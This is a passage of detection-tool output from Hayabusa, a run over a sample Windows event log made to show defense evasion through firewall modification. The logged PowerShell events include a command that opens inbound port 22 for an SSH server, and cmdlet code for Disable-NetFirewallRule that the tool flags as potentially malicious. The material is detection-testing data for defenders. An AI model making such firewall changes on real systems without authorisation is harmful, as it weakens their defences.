value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.783 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.788 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.792 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.793 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.795 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.796 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,>,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.944 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.944 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.947 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.947 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.948 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.948 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.948 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.949 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.950 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,":String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException """,rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.954 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.954 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.957 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.958 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.958 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.958 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.959 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.976 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.980 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.985 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.994 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.998 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.999 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:30.001 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:30.043 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:30.044 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:30.046 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:43.608 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:43.609 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.641 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.641 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.642 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.652 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.653 